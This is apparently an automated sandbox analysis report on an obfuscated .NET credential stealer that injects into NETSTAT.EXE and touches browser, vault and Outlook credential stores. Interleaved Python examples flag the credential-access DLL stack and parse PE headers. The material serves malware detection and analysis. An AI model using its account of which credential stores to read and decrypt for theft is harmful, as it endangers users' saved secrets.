            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Sections loaded: iphlpapi.dll, snmpapi.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
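            The module list for NETSTAT.EXE is the informative part of this block: a genuine netstat run needs iphlpapi.dll and snmpapi.dll, not winsqlite3.dll, vaultcli.dll and dpapi.dll (the SQLite, Credential Manager and DPAPI pieces needed to open and decrypt browser and mail credential stores; the CREATE TABLE password_notes string above is the Chromium Login Data schema read through winsqlite3.dll), nor the wininet.dll/winhttp.dll HTTP clients. The Python below is an added example, not code from the report: it compares a process's observed image loads against a per-image baseline and flags the credential-access stack. The baseline set is an assumption for the example (a real one is derived from clean-host telemetry), and the events are constructed from the NETSTAT.EXE lines above plus a clean control run.

```python
import ntpath
from collections import defaultdict

# Expected module set per image (constructed baseline for this example; in practice derive it
# from image-load telemetry of clean hosts). Keys are lower-case image basenames.
BASELINE = {
    "netstat.exe": {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "msvcrt.dll", "ws2_32.dll",
                    "iphlpapi.dll", "snmpapi.dll", "kernel.appcore.dll"},
}
# Capability implied by an out-of-profile module (standard Windows DLLs; descriptions are mine).
CAPABILITY = {
    "winsqlite3.dll": "SQLite engine: reads browser Login Data / cookie databases",
    "vaultcli.dll": "Windows Credential Manager (vault) access",
    "dpapi.dll": "DPAPI unprotect: decrypts saved browser and mail credentials",
    "wininet.dll": "HTTP client (exfiltration / C2)",
    "winhttp.dll": "HTTP client (exfiltration / C2)",
    "netapi32.dll": "NetAPI workstation/domain queries",
}
CREDENTIAL_STACK = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}


def triage_loads(events, baseline=BASELINE):
    """events: iterable of (image_path, module_name). Returns a per-image triage dict."""
    loaded = defaultdict(set)
    for image, module in events:
        loaded[image].add(module.lower())
    report = {}
    for image, modules in loaded.items():
        expected = baseline.get(ntpath.basename(image).lower())
        # Without a baseline every module is reported, flagged via baseline_known=False.
        unexpected = sorted(modules - expected) if expected is not None else sorted(modules)
        cred = modules & CREDENTIAL_STACK
        report[image] = {
            "baseline_known": expected is not None,
            "unexpected": unexpected,
            "capabilities": {m: CAPABILITY[m] for m in unexpected if m in CAPABILITY},
            # Two of sqlite/vault/DPAPI together is the decrypt-stored-secrets footprint.
            "credential_access": len(cred) >= 2,
        }
    return report


INJECTED = r"C:\Windows\SysWOW64\NETSTAT.EXE"
CLEAN = r"C:\Windows\System32\netstat.exe"

# Constructed events: the NETSTAT.EXE loads listed in this report, plus a clean run for contrast.
SAMPLE_LOADS = [(INJECTED, m) for m in (
    "iphlpapi.dll", "snmpapi.dll", "wininet.dll", "kernel.appcore.dll", "uxtheme.dll",
    "ieframe.dll", "iertutil.dll", "netapi32.dll", "version.dll", "userenv.dll", "winhttp.dll",
    "wkscli.dll", "netutils.dll", "sspicli.dll", "windows.storage.dll", "wldp.dll", "profapi.dll",
    "secur32.dll", "mlang.dll", "propsys.dll", "winsqlite3.dll", "vaultcli.dll", "wintypes.dll",
    "dpapi.dll", "cryptbase.dll")] + [(CLEAN, m) for m in ("iphlpapi.dll", "snmpapi.dll", "ws2_32.dll")]

if __name__ == "__main__":
    for image, r in triage_loads(SAMPLE_LOADS).items():
        print(image, "credential_access=%s" % r["credential_access"])
        for mod, why in r["capabilities"].items():
            print("   ", mod, "->", why)
```

            The clean System32 copy comes back with an empty unexpected list; the hollowed SysWOW64 copy is flagged for credential access on winsqlite3.dll plus dpapi.dll plus vaultcli.dll. Apply the same rule to any image that is neither a browser nor a mail client.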
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: NU1aAbSmCr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: NU1aAbSmCr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: NU1aAbSmCr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: tTOn.pdbSHA256 source: NU1aAbSmCr.exe
            Source: Binary string: netstat.pdbGCTL source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netstat.pdb source: NU1aAbSmCr.exe, 00000004.00000002.1821360439.0000000001157000.00000004.00000020.00020000.00000000.sdmp, mCFHCvdrqdDiDT.exe, 0000000A.00000002.2579923948.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mCFHCvdrqdDiDT.exe, 0000000A.00000002.2578656019.000000000005E000.00000002.00000001.01000000.0000000C.sdmp, mCFHCvdrqdDiDT.exe, 0000000E.00000000.1887553135.000000000005E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NU1aAbSmCr.exe, NU1aAbSmCr.exe, 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 0000000B.00000003.1821240093.0000000003553000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000002.2581929956.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 0000000B.00000003.1823573799.000000000370C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tTOn.pdb source: NU1aAbSmCr.exe

            Data Obfuscation

            Source: NU1aAbSmCr.exe, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.cs | .Net Code: kIl6PxJ2J5 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2a6e8c4.1.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2ab4188.0.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2abd7a0.3.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, aAZly5Crsqfj1ghU4r.cs | .Net Code: kIl6PxJ2J5 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.6e20000.5.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 0.2.NU1aAbSmCr.exe.2a652ac.2.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
            Source: 11.2.NETSTAT.EXE.3eecd14.2.raw.unpack, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.mCFHCvdrqdDiDT.exe.257cd14.1.raw.unpack, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.mCFHCvdrqdDiDT.exe.257cd14.1.raw.unpack, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 15.2.firefox.exe.5eccd14.0.raw.unpack, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: NU1aAbSmCr.exe | Static PE information: 0xC29198FE [Sat Jun 10 12:03:10 2073 UTC]
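            The static PE findings on this page (EXECUTABLE_IMAGE and 32BIT_MACHINE, the .text section flags, the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR and IMAGE_DIRECTORY_ENTRY_DEBUG directories, the DYNAMIC_BASE/NX_COMPAT/NO_SEH/TERMINAL_SERVER_AWARE characteristics, and the link timestamp 0xC29198FE that decodes to June 2073) all come from the PE headers. The Python below is an added example, not part of the report: it parses those fields from a PE32 image with only the standard library and applies the timestamp check. The image it parses is a minimal header-only PE32 constructed inside the block, not the analysed sample. It also encodes the caveat that matters here: on a .NET assembly (COM descriptor present) an impossible timestamp is weak evidence on its own, because deterministic Roslyn builds store a content hash with the high bit set in TimeDateStamp, which is exactly why such binaries show dates after 2038.

```python
import struct
from datetime import datetime, timedelta, timezone

# Flag names for the fields quoted in this report (values from the PE/COFF specification).
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
                       0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x00000020: "IMAGE_SCN_CNT_CODE", 0x20000000: "IMAGE_SCN_MEM_EXECUTE",
                 0x40000000: "IMAGE_SCN_MEM_READ", 0x80000000: "IMAGE_SCN_MEM_WRITE"}
DIR_DEBUG, DIR_COM_DESCRIPTOR = 6, 14
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def _flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32(data: bytes) -> dict:
    """Parse the COFF header, PE32 optional header and section table of an in-memory image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, n_sections, timestamp, _, _, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                     # optional header follows the 20-byte COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 (32-bit) optional header")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(min(n_dirs, 16))]
    sections = []
    for i in range(n_sections):
        raw = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append((raw[0].rstrip(b"\0").decode("ascii", "replace"),
                         _flag_names(raw[9], SECTION_FLAGS)))
    return {
        "machine": machine,
        "timestamp": EPOCH + timedelta(seconds=timestamp),   # TimeDateStamp: seconds since 1970
        "characteristics": _flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": _flag_names(dll_chars, DLL_CHARACTERISTICS),
        "has_debug_dir": len(dirs) > DIR_DEBUG and dirs[DIR_DEBUG][1] > 0,
        "is_dotnet": len(dirs) > DIR_COM_DESCRIPTOR and dirs[DIR_COM_DESCRIPTOR][1] > 0,
        "sections": sections,
    }


def timestamp_findings(info: dict, now=None) -> list:
    """Flag an impossible link time; downgrade it for .NET, where deterministic builds store a hash."""
    now = now or datetime.now(timezone.utc)
    findings = []
    if info["timestamp"] > now:
        note = "link timestamp in the future"
        if info["is_dotnet"]:
            note += " (low confidence: deterministic .NET builds put a content hash here)"
        findings.append(note)
    return findings


def build_sample_pe32(timestamp: int, dll_chars: int = 0x8540, dotnet: bool = True) -> bytes:
    """Constructed header-only PE32 image for this example; not the analysed sample."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                                   # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)  # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                   # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                                     # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_DEBUG, 0x2000, 0x1C)
    if dotnet:
        struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, 0x2008, 0x48)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x2000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)   # CNT_CODE | MEM_EXECUTE | MEM_READ
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    info = parse_pe32(build_sample_pe32(0xC29198FE))
    print(info["timestamp"].strftime("%a %b %d %H:%M:%S %Y UTC"), info["dll_characteristics"])
    print(timestamp_findings(info))
```

            Run against a real file, read it with open(path, "rb") and hand the bytes to parse_pe32; the parser stops at the section table, so a header-only dump such as the .raw.unpack artefacts above is enough for it.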
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 0_2_06ED0006 push es; retf 0_2_06ED001C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_00402095 push ss; iretd 4_2_004020A8
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_00414171 push FB06D95Fh; retf 4_2_0041417F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0040B9BB pushfd ; iretd 4_2_0040B9C1
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0041922D push ebx; iretd 4_2_00419237
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0040229B pushad ; iretd 4_2_0040229C
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0041EB21 push es; retf 4_2_0041EB2F
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0040AB94 push edi; ret 4_2_0040AB96
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_00403470 push eax; ret 4_2_00403472
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0041AC75 push 4C25DD1Ah; ret 4_2_0041AC7A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_004124EA push eax; retf 4_2_00412512
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_004124F3 push eax; retf 4_2_00412512
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0040D572 push ss; ret 4_2_0040D577
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_0040AD00 push ebp; iretd 4_2_0040AD01
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_00418694 push ds; retf 4_2_00418695
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_00406717 push esi; ret 4_2_0040671A
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015B225F pushad ; ret 4_2_015B27F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015B27FA pushad ; ret 4_2_015B27F9
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015E09AD push ecx; mov dword ptr [esp], ecx 4_2_015E09B6
            Source: C:\Users\user\Desktop\NU1aAbSmCr.exe | Code function: 4_2_015B283D push eax; iretd 4_2_015B2858
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe | Code function: 10_2_02FA92E6 push ebp; iretd 10_2_02FA92E7
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB0AD0 push eax; retf 10_2_02FB0AF8
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB925B push 4C25DD1Ah; ret 10_2_02FB9260
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA9382 push esp; iretd 10_2_02FA9383
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FABB58 push ss; ret 10_2_02FABB5D
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB7813 push ebx; iretd 10_2_02FB781D
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA917A push edi; ret 10_2_02FA917C
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FBD107 push es; retf 10_2_02FBD115
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA9FA1 pushfd ; iretd 10_2_02FA9FA7
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FB2757 push FB06D95Fh; retf 10_2_02FB2765
            Source: C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exeCode function: 10_2_02FA4CFD push esi; ret 10_2_02FA4D00
            Source: NU1aAbSmCr.exeStatic PE information: section name: .text entropy: 7.879696863228832
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, tQdy11d6ImjZgTeIqp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tcyvx7LDs1', 'ygOv7QJADU', 'oaAvzorxx6', 'qcE1j45nu0', 'FCb1bojcC8', 'xb81vVHfKB', 'N8l11rWAJn', 'QKQpqbjXruDqFYyVtwZ'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, IVbgTfTQ1POo67aCur.csHigh entropy of concatenated method names: 'fTqQAoGQiT', 'D1iQdFCFdF', 'VJDQGmdkwo', 'GamG7MUlLq', 'ikHGzGLb3y', 'IjOQjZNBCW', 'q9BQbbGY9n', 'jZlQvWB98n', 'koVQ1fXRNF', 'c8nQ6f1SsE'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, poGijHhIotUk5asnJA.csHigh entropy of concatenated method names: 'Dispose', 's6hbxr3l7U', 'MGJvN5hncE', 'lgAHHPrn9u', 'LTMb7lII1l', 'HdZbzaP37u', 'ProcessDialogKey', 'RJyvjSeEeq', 'QfYvbUrYvI', 'uwDvvFEFA2'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, eEFA2Q7p9QYJBbocTC.csHigh entropy of concatenated method names: 'g0W0bF1Fmq', 'jWM01boqK9', 'ylI06OiYfq', 'NUk0AxTmTD', 'n4L0hYX2ZD', 'hrf0llqpet', 'sBt0GkW6MB', 'qOEiwZpvQL', 'pTYie3KEn4', 'zrjixwtmAq'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, RuKXdbNqM3dp2oD6yS.csHigh entropy of concatenated method names: 'KJRYg1ve2yD7gPRcF2O', 'dUdVtWvfc3PMenZuxXI', 'wrkGiAlsi0', 'u7wG0u7Rri', 'YxHGtGgP7T', 'xN7FuGvxkKgaMhaMSjA', 'BMHLqJvpciMGXagmoPt', 'HsCRUyvP9yJU6aepABv'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, eBfLGP5uru6CY0dB1U.csHigh entropy of concatenated method names: 'ufgdRsWf9a', 'BnSdL3oqTu', 'pfMdWwoOWd', 'aQMd5LCyLN', 'M18dOYa6nl', 'ORZdMXISSi', 'TTDdEhmEbL', 'Kmpdi7je8d', 'QTmd0yKvf4', 'sh8dt7oOas'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, XWwa6bWsPleF4dvV8t.csHigh entropy of concatenated method names: 'bkxhK9LrwG', 'gQrh4Nt1lV', 'fIohZHbBDj', 'cOJhkHiBbC', 'Ifhhuo1A64', 'GVlhrYnann', 'tBihwiJMmv', 'uoHheYF2Yo', 'Ft6hx2MEDy', 'aDNh7AbYlj'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, LPAgiLrIFHs4ZRwD8d.csHigh entropy of concatenated method names: 'pAQEeCMw4N', 'd58E7IwaDn', 'cqpijbKojH', 'cR8ibj6rey', 'wMxEnEV1PD', 'EMHEHXZio3', 'DauEJKVSLU', 'yw6EKKqrR9', 'TdNE4C5jiL', 'dDTEZ0MhFp'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, ySeEeqxJfYUrYvIswD.csHigh entropy of concatenated method names: 'PHviX7MQdB', 'C4qiNt4JQQ', 'OeDiaS3rQi', 'oWFiS9PxML', 'btxiK5aKV6', 'YShigbY9yr', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, UJA3GRK8lGX2d9ulYH.csHigh entropy of concatenated method names: 'YJ0O9yocjL', 'iLUOHvb4hO', 'sCwOKb56g5', 'sKXO4SHSCS', 'ph8ON2p1Ai', 'aH0OahYBMW', 'ypCOSHpoUo', 'AGJOg6d8Z4', 'g4kOfi0ntq', 'IOgOT2wVF6'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, cowFnQbjOWIvD4misX2.csHigh entropy of concatenated method names: 'SD20mMhvEG', 'fD70yrM1MC', 'yfq0Pvb4F3', 'oOS0RoQlnh', 'Wp902v7lvd', 'Cn30L1iCuE', 'MLa0oApMVG', 'tyn0WOfOCd', 't2m05SD2M4', 'VCv0IH4oCk'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, aAZly5Crsqfj1ghU4r.csHigh entropy of concatenated method names: 'Gsu1FXOZt8', 'Dx91AM9aA3', 'ShI1hIBfqr', 'rHH1dwUKaA', 'CAK1lcEsLh', 'oKL1G4IU2N', 'PDU1Qe2fAy', 'oCD1CKPOGW', 'vIJ1YTxhOV', 'obR1D2sAcA'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, vimOCXIBCjJPTdQTW9.csHigh entropy of concatenated method names: 'PsFl2RGWll', 'IsploSHt76', 'i1Zda2fag1', 'KmOdSN9M99', 'Nncdgp89wc', 'yOKdfEu8Gu', 'C4HdTkcafj', 'VTLd8rP29g', 'L0IdchnI1t', 'vU0d9bjn01'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, KMlII1eladZaP37uKJ.csHigh entropy of concatenated method names: 'VEpiA1jkJJ', 'r7jihUsJg5', 'BCBidW1VUV', 'FDSilTALAr', 'qUQiGU3dv9', 'SThiQYoFr5', 'xbYiCfE0Uu', 'FRuiYh76eY', 'xtsiDranEx', 'fqmiUEo5Co'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, dEy136JlvLIeHAG4Vr.csHigh entropy of concatenated method names: 'q4QqWJtOA2', 'FQtq5abB2e', 'xwNqXBvurJ', 'PQGqNTkvkZ', 'Wa2qS4uyaS', 'elwqg2gmTg', 'GCEqTsNcr0', 'AN1q8jQ8H4', 'sbnq9NxRN9', 'BFfqn4T5Gn'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, KAqfjpc2gGlfOCpH2c.csHigh entropy of concatenated method names: 'tH2QmZP68p', 'ODrQygOJpn', 'z6jQP6Tb4w', 'GsoQR9uJVs', 'cpkQ2yuPRV', 'ROKQLYK7L7', 'PttQo7H6Y7', 'v6JQWyXGwm', 'PjOQ5KC338', 'NHQQIIkD0O'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, AZQ9PHv32R6FkTCKsI.csHigh entropy of concatenated method names: 'yxiPPifbu', 'XWxRljALV', 'tnQLYdgOG', 'twioBhgGQ', 'gjX5MnAvy', 'h7tI6gQ3p', 'zFZ6TXIQZZSZV1in11', 'Xdcp3wNXkCeDOFPiQK', 'w9miqciIe', 'WJstmBV3O'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, kc688j6nmmtYoQgfN7.csHigh entropy of concatenated method names: 'xaebQWwa6b', 'uPlbCeF4dv', 'zurbDu6CY0', 'hB1bUU3imO', 'gQTbOW9DvP', 'xbZbMIdhfY', 'lGpTyenY6tRpEcKYy3', 'uqQ8I8HSnSgdfNkkOV', 'QArbbGEWV6', 'vf5b1ZjqbB'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, ywRNQ9kpJpmw0oOgQg.csHigh entropy of concatenated method names: 'jGnEDJA6dH', 'IX4EUWsXJf', 'ToString', 'n9SEANfeYK', 'UTtEhPXQJg', 'LxbEd8jrmq', 'cx0ElrMROx', 'l0xEGFj1jU', 'iQnEQHw247', 'lviECyyuV7'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, H64pdQb1gX4rea6PeLc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QZKtKR2WHh', 'dept4Q1cYE', 'ARftZGplkh', 'EVttkPE8Ku', 'UNXtu82rl2', 'NSTtrTWFsE', 'UeKtwSoyp6'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, CvS56KZhYxBb5epEhU.csHigh entropy of concatenated method names: 'ToString', 'JP7Mnyl0DO', 'I6JMNJCTUI', 'hFDMapuBTD', 'KVDMSlPM5D', 'zilMgC3ON6', 'a16MfnpnZH', 'bYeMTVqAeC', 'QPkM8RX7WB', 'fcfMc5ZiWd'
            Source: 0.2.NU1aAbSmCr.exe.3cf89a0.4.raw.unpack, lvPpbZXIdhfYh5i4EU.csHigh entropy of concatenated method names: 'mm0GFt3LIj', 'TwtGhuhONn', 'yBcGlQVTuc', 'V6eGQrpt3m', 'RR4GCqr4hb', 'Smlluavpuu', 'BSMlrrgbGy', 'bv9lwh5u8W', 'UlPleu8yMj', 'q4ZlxCJsGN'
            Source: 0.2.NU1aAbSmCr.exe.2a6e8c4.1.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2ab4188.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.2abd7a0.3.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, tQdy11d6ImjZgTeIqp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'tcyvx7LDs1', 'ygOv7QJADU', 'oaAvzorxx6', 'qcE1j45nu0', 'FCb1bojcC8', 'xb81vVHfKB', 'N8l11rWAJn', 'QKQpqbjXruDqFYyVtwZ'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, IVbgTfTQ1POo67aCur.csHigh entropy of concatenated method names: 'fTqQAoGQiT', 'D1iQdFCFdF', 'VJDQGmdkwo', 'GamG7MUlLq', 'ikHGzGLb3y', 'IjOQjZNBCW', 'q9BQbbGY9n', 'jZlQvWB98n', 'koVQ1fXRNF', 'c8nQ6f1SsE'
            Source: 0.2.NU1aAbSmCr.exe.7a30000.6.raw.unpack, poGijHhIotUk5asnJA.csHigh entropy of concatenated method names: 'Dispose', 's6hbxr3l7U', 'MGJvN5hncE', 'lgAHHPrn9u', 'LTMb7lII1l', 'HdZbzaP37u', 'ProcessDialogKey', 'RJyvjSeEeq', 'QfYvbUrYvI', 'uwDvvFEFA2'
